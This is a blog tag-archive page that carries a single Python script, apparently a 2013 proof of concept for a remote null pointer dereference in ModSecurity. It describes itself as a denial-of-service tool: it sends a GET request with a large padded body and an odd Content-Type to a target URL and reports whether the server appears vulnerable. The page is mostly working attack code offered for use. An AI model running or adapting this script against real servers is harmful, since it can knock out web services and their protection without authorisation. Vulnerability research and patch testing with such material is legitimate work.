Tag Archive for ModSecurity Remote python exploit

ModSecurity Remote Null Pointer Dereference

ModSecurity Remote Null Pointer Dereference

python exploit code

#!/usr/bin/env python3 #-*- coding: utf-8 -*- # # Created on Mar 29, 2013 # # @author: Younes JAAIDI <<a href="mailto:yjaaidi@shookalabs.com">yjaaidi@shookalabs.com</a>> #

import argparse import http.client import logging import sys import urllib.request

logger = logging.getLogger(__name__) logger.setLevel(logging.DEBUG) logger.addHandler(logging.StreamHandler(sys.stderr))

class ModSecurityDOSCheck(object):

_DEFAULT_REQUEST_BODY_SIZE = 200 # KB     _DEFAULT_CONCURRENCY = 100     _DEFAULT_USER_AGENT = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36"

def __init__(self):         self._request_counter = 0         self._status_message = None

def main(self, args_list):         args_object = self._parse_args(args_list)                 payload = "A" * args_object.request_body_size * 1024                 request = urllib.request.Request(args_object.target_url,                                          method = "GET",                                          data = payload.encode('utf-8'),                                          headers = {'Content-Type': 'text/random',                                                     'User-Agent': self._DEFAULT_USER_AGENT})                 if self._send_request(request):             logger.info("Target seems to be vulnerable!!!")             return 0         else:             logger.info("Attack didn't work. Try increasing the 'REQUEST_BODY_SIZE'.")             return 1

def _parse_args(self, args_list):         parser = argparse.ArgumentParser(description="ModSecurity DOS tool.")         parser.add_argument('-t', '--target-url',                             dest = 'target_url',                             required = True,                             help = "Target URL")         parser.add_argument('-s', '--request-body-size',                             dest = 'request_body_size',                             default = self._DEFAULT_REQUEST_BODY_SIZE,                             type = int,                             help = "Request body size in KB")                 return parser.parse_args()

def _send_request(self, request):         try:             urllib.request.urlopen(request)             return False         except (http.client.BadStatusLine, urllib.error.HTTPError):             return True

if __name__ == '__main__':     sys.exit(ModSecurityDOSCheck().main(sys.argv))